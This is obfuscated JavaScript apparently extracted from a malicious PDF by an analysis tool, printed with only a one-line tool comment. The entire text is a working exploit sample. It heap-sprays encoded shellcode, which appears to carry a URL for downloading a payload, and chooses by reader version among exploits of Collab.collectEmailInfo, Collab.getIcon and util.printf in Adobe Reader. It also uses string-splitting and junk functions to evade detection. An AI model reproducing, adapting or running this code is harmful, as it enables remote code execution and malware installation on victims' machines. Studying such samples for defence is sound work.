// peepdf comment: Javascript code located in object 7 (version 0)

var xyutequex = false;
var wochechuc = new Array();

function hethithyq() {}
function wexyixyat() {}
var thexye;

function cazethexy(cazethexy) {
    return true;
}
this.pecuwo = 24560;

function kazuq(mochyb, fabaquochu) {
    function thith(thith) {
        return thith;
    }
    while (mochyb.length * 2 < fabaquochu) mochyb += mochyb;
    this.quynopaque = 'quynopaque';
    mochyb = mochyb.substring(0, fabaquochu / 2);

    function natoj(natoj) {
        return natoj;
    }
    return mochyb;
}
this.laxyeth = false;

function tychux(gabuz) {
    var nithochyp = false;
    var xyicedax = 0x0c0c0c0c;
    var queth = false;
    var cotuchuvuq = false;
    var xyymichan = new Array('%u4343%', 'u4343%u4', '343%u', '0FEB%u33', '5B%u6', '6C9%u', '80B9%u80', '01%uEF3', '3%uE243%', 'uEBFA', '%uE805%u', 'FFEC%u', 'FFFF%', 'u8B7F', '%uDF4E%u', 'EFEF%u', '64EF%uE', '3AF%u9F', '64%u4', '2F3%u9', 'F64%u6EE', '7%uEF', '03%uEFE', 'B%u64EF%', 'uB903', '%u6187%', 'uE1A1%u0', '703%uEF', '11%uEF', 'EF%uA', 'A66%uB9', 'EB%u778', '7%u651', '1%u07E1', '%uEF1F%', 'uEFEF', '%uAA6', '6%uB9', 'E7%uCA87', '%u105F%', 'u072D%uE', 'F0D%u', 'EFEF%', 'uAA66%uB', '9E3%u00', '87%u0', 'F21%u', '078F%', 'uEF3B%uE', 'FEF%u', 'AA66%u', 'B9FF%u2', 'E87%u0', 'A96%u075', '7%uEF', '29%uEF', 'EF%uAA66', '%uAFFB%u', 'D76F%u', '9A2C%', 'u6615%uF', '7AA%uE8', '06%uE', 'FEE%uB1E', 'F%u9A6', '6%u64CB%', 'uEBAA', '%uEE85%', 'u64B6%u', 'F7BA%u', '07B9%uE', 'F64%uEF', 'EF%u8', '7BF%uF', '5D9%u', '9FC0%u', '7807%u', 'EFEF%u6', '6EF%uF', '3AA%u2', 'A64%u2F6', 'C%u66BF', '%uCFAA%u', '1087%u', 'EFEF%', 'uBFEF', '%uAA64', '%u85FB', '%uB6ED%u', 'BA64%u', '07F7%', 'uEF8E%uE', 'FEF%uAAE', 'C%u28', 'CF%uB3EF', '%uC191%', 'u288A%u', 'EBAF%', 'u8A97', '%uEFE', 'F%u9A10', '%u64C', 'F%uE3AA', '%uEE85%', 'u64B6', '%uF7BA%u', 'AF07%', 'uEFEF%', 'u85EF%u', 'B7E8%u', 'AAEC%', 'uDCCB%', 'uBC34', '%u10BC', '%uCF9A', '%uBCBF%u', 'AA64%u', '85F3%uB', '6EA%uBA6', '4%u07F', '7%uEF', 'CC%uEF', 'EF%uEF', '85%u9A', '10%u64CF', '%uE7A', 'A%uED85', '%u64B', '6%uF7BA%', 'uFF07%', 'uEFEF%u8', '5EF%u641', '0%uFFAA%', 'uEE85%u', '64B6%uF', '7BA%u', 'EF07%u', 'EFEF%u', 'AEEF%uBD', 'B4%u0E', 'EC%u0EE', 'C%u0EEC', '%u0EEC%', 'u036C', '%uB5EB', '%u64B', 'C%u0D', '35%uB', 'D18%u', '0F10%u6', '4BA%u640', '3%uE7', '92%uB2', '64%uB9E', '3%u9C6', '4%u64', 'D3%uF1', '9B%uEC9', '7%uB91C', '%u9964%', 'uECCF%u', 'DC1C%uA', '626%u42A', 'E%u2C', 'EC%uDCB9', '%uE019%u', 'FF51%u1', 'DD5%uE', '79B%u212', 'E%uECE2%', 'uAF1D', '%u1E0', '4%u11', 'D4%u9A', 'B1%uB5', '0A%u0', '464%uB', '564%u', 'ECCB%u8', '932%u', 'E364%u', '64A4%u', 'F3B5%u', '32EC%', 'uEB64%uE', 'C64%u', 'B12A%u2D', 'B2%uEFE', '7%u1B', '07%u101', '1%uBA1', '0%uA3BD', '%uA0A2%', 'uEFA1%u', '7468%', 'u7074%u', '2F3A%u7', '72F%u7', '777%u6', '52E%u6', '176%u67', '6E%u6C', '65%u736', '9%u6863%', 'u692D%u', '2D6E%u61', '72%u68', '74%u6', '42E%u2F6', '5%u616', 'C%u646E%', 'u6E69%', 'u2F67%u', '7865%u2', 'E65%u68', '70%u3F', '70%u3D7', '8%u6470%', 'u0066', '');

    function kychojop(kychojop) {
        return true;
    }
    xyythoch = xyymichan.join("");
    var quachytho = 9814;
    var thicho = 'thicho';
    var quafynuquo = eval("un" + "es" + "ca" + "pe" + "")(xyythoch);

    function cytichich(cytichich) {
        return cytichich;
    }
    var xyewud = 13398;
    if (gabuz == 1) {
        this.choxye = false;
        xyicedax = 0x30303030;

        function pedip(pedip) {
            return true;
        }
        quafynuquo = eval("un" + "es" + "ca" + "pe" + "")(xyythoch);
        this.chevyfemaq = "chevyfemaq";
    } else if (gabuz == 2) {
        var xyajy = 'xyajy';
        quafynuquo = eval("une" + "sca" + "pe" + "")(xyythoch);

        function xyisupody(xyisupody) {
            return true;
        }
    }
    var cyquelejaq = false;

    function thochy() {}
    this.jogixyu = 1171;
    var quovequiva = 0x400000;
    var parethece = false;
    var rycofychum = quafynuquo.length * 2;
    this.xyycha = false;
    var fabaquochu = quovequiva - (rycofychum + 0x38);
    this.fucaquich = 'fucaquich';
    var mochyb = eval("une" + "sca" + "pe" + "")("%u909" + "0%u90" + "90" + "");

    function wecaxya(wecaxya) {
        return true;
    }
    mochyb = kazuq(mochyb, fabaquochu);

    function chequoc() {}
    var bijuja = (xyicedax - 0x400000) / quovequiva;
    this.thyque = 'thyque';
    for (var zeduxy = 0; zeduxy < bijuja; zeduxy++) wochechuc[zeduxy] = mochyb + quafynuquo;

    function quesuz(quesuz) {
        return true;
    }
}
function xyejywed() {
    var xyixyuquac = 'xyixyuquac';
    var micachy = 0;
    this.chuthoc = "chuthoc";
    var kaxyucochi = app.viewerVersion.toString();

    function quothete(quothete) {
        return true;
    }
    app.clearTimeOut(thexye);
    this.chahach = "chahach";
    if ((kaxyucochi >= 8 && kaxyucochi < 8.102) || kaxyucochi < 7.1) {
        this.quakaxyi = false;
        tychux(0);

        function xyuchonyq(xyuchonyq) {
            return true;
        }
        var requochos = unescape("%u" + "0c" + "0c" + "%u" + "0c" + "0c" + "");
        var xyimy = 21631;
        while (requochos.length < 0xaf98) requochos += requochos;
        var xyeth = false;
        eval("this")["co" + "ll" + "ab" + "St" + "or" + "e" + ""] = eval("Col" + "lab" + "")["co" + "ll" + "ec" + "tE" + "ma" + "il" + "In" + "fo" + ""]({
            subj: "dilyxyyqu",
            msg: requochos
        });
        var jequed = 'jequed';
    }
    if ((kaxyucochi >= 8.102 && kaxyucochi < 8.104) || (kaxyucochi >= 9 && kaxyucochi < 9.1) || kaxyucochi <= 7.101) {
        try {
            if (app["do" + "c" + ""]["Co" + "ll" + "ab" + ""]["get" + "Ico" + "n" + ""]) {
                function dachi(dachi) {
                    return dachi;
                }
                tychux(2);
                this.thexyi = "thexyi";
                var dumizec = eval("un" + "es" + "ca" + "pe" + "")("%09");
                var masyxyuch = 'masyxyuch';
                this.xyychy = 'xyychy';
                while (dumizec.length < 0x4000) dumizec += dumizec;
                this.xyyxyas = 11155;
                dumizec = "N." + dumizec;

                function chiquuchib(chiquuchib) {
                    return true;
                }
                eval("ap" + "p" + "")["do" + "c" + ""]["Co" + "ll" + "ab" + ""]["ge" + "tI" + "co" + "n" + ""](dumizec);
                var thada = 'thada';
                micachy = 1;

                function xyuchocho(xyuchocho) {
                    return true;
                }
            } else micachy = 1;
        } catch (e) {
            micachy = 1;
        }
        if (micachy == 1) {
            if (kaxyucochi == 8.102 || kaxyucochi == 7.1) {
                tychux(1);
                this.dykexy = 15280;
                var tyxyecechi = 12954;
                eval("ut" + "il" + "")["pri" + "ntf" + ""]("%4" + "50" + "00" + "f" + "", "1299999999999999" + "9999888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "88888888" + "");
            }
        }
    }
}
app.chiny = xyejywed;

function noquifyqu(noquifyqu) {
    return noquifyqu;
}
thexye = app.setTimeOut("app.chiny()", 10);

